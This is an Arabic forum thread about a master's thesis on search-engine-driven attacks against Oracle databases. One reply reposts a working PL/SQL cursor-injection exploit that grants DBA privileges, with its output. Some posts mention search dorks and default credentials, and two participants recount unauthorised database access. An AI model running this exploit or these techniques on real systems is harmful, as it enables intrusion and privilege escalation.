بتاريخ: 5 مايو 201015 سنة comment_191255 السلام عليكم ورحمة الله وبركاته ارجو من الاخوه الزملاء ابداء ارائهم بخصوص رساله بحث بالماجستير والتى هى بعنوان Seuring oracle database from search engines attack الموضوع باختصار بيتكلم عن مخاطر محركات البحث فى الوصول الى قواعد البيانات اوراكل وبالتالى مهاجمتها وهّذا يتم من خلال الدخول الى محركات البحث واجراء البحث عن كلمات دلالية للدخول الى الداتابيز انجن (isqlplus) فيقوم الهاكر بكتابة urltitle:/isqlplus او كتابة tnsnames او كلمات اخرى للدخول الى قواعد البانات وباستخدام default username/password يمكن الدخول على النظام وهذا لايتم فى جميع الانظمه ولكن يتم فقط فى الانظمه التى لم يتم عمل حماية على قوعد البيانات الخاصه بها وللاسف هذه النسبة لست بقليل حيث اجتازت حوالى 40% وهذه نسبة ليست بهينه الموضوع بصراحه عجبنى من خلال تصفحى بالانترنت والبحث عن مواضيع تخص الاوراكل سيكورتى فوجدت هذه المقاله والتى هى بعنوان" Search engine used to attack database" ودا الرابط الخاص بالملف ال بيشرحه http://www.itsec.gov.cn/docs/2009050...25368.pdf ويوجد اخرى للاختراق من خلال محركات البحث مثل Default Passwords .Easily-guessed Passwords .Misconfigurations Excessive PrivilegesNo Listener Password .Denial of Services (DoS) & Buffer Overflows.SQL injectionونزلت مقالات كثيره بخصوص هذا الموضوع ارجو من الاخوه الزملاء ابداء ارائهم واقتراحاتهم بخصوص هذا الموضوع وهل لى ان ادعم هذه الرسالة بمشروع عملى ام لاارجو ان لا تبخلو على بأرائكم فهى تهمنى اشكركم تقديم بلاغ
بتاريخ: 5 مايو 201015 سنة comment_191297 السلام عليكم قد يكون من أسباب تأخر الرد عدم كتابة عنوان واضح للمشاركة تم تعديل العنوان ونتمنى لك التوفيق .... تقديم بلاغ
بتاريخ: 5 مايو 201015 سنة كاتب الموضوع comment_191306 اشكرك اخى عادل الشهرى عن هذا التوضيح تقديم بلاغ
بتاريخ: 5 مايو 201015 سنة comment_191312 This is slightly modified version of: http://milw0rm.com/exploits/7677This is based on cursor injection and does not need create function privileges:DECLARED NUMBER;BEGIND := DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');end;#-----------screen dump---------------------------------------------------#SQL> select * from user_role_privs;USERNAME GRANTED_ROLE ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT CONNECT NO YES NOSCOTT EXECUTE_CATALOG_ROLE NO YES NOSCOTT RESOURCE NO YES NOSQL> DECLARE 2 D NUMBER; 3 BEGIN 4 D := DBMS_SQL.OPEN_CURSOR; 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); 8 end; 9 10 11 /DECLARE*ERROR at line 1:ORA-01403: no data foundORA-06512: at "SYS.LT", line 6118ORA-06512: at "SYS.LT", line 6087ORA-06512: at line 7SQL> select * from user_role_privs;USERNAME GRANTED_ROLE ADM DEF OS_------------------------------ ------------------------------ --- --- ---SCOTT CONNECT NO YES NOSCOTT DBA NO YES NOSCOTT EXECUTE_CATALOG_ROLE NO YES NOSCOTT RESOURCE NO YES NOSidwww.notsosecure.com# milw0rm.com [2009-07-02] تقديم بلاغ
بتاريخ: 6 مايو 201015 سنة كاتب الموضوع comment_191342 أخى zezo_isl ممكن توضح ماذا نعنى بمجموعة هذه الاسطر تقديم بلاغ
بتاريخ: 6 مايو 201015 سنة comment_191368 سلام عليكم انا لست خبير فى نظام الحماية ولكن وجد معلومة عن SQL injection هذه السطور مثال عليها فى المشاركة السابقة - وكان من فترة وجد سطر sql على النت تضعة فى شريط البحث بجوجل يظهر لى تصميم القاعدة البيانات بعض المواقع عشوائى وسجلات الجداول وكلامات السر وكان ايامها دخلت على موقع كلية حاسبات جامعة عين شمس ولكن لاسف فقدت السطر ولكن الذى اتذكرة كان يعتمد على default username/password تقديم بلاغ
بتاريخ: 7 مايو 201015 سنة كاتب الموضوع comment_191385 شكرا لك اخى zezo_isl على ردك وتفاعلك وبالفعل هذا ما اقوم بعمل الماستر فيه هو خطوره محركات البحث فى الدخول على قواعد البيانات فانا اتذكر ايضا زميل دخل على منظمه قويه باستخدام الديفلولت اكونت ارجو تفاعل الناس بخصوص هذا الموضوع تقديم بلاغ
انضم إلى المناقشة
يمكنك المشاركة الآن والتسجيل لاحقاً. إذا كان لديك حساب, سجل دخولك الآن لتقوم بالمشاركة من خلال حسابك.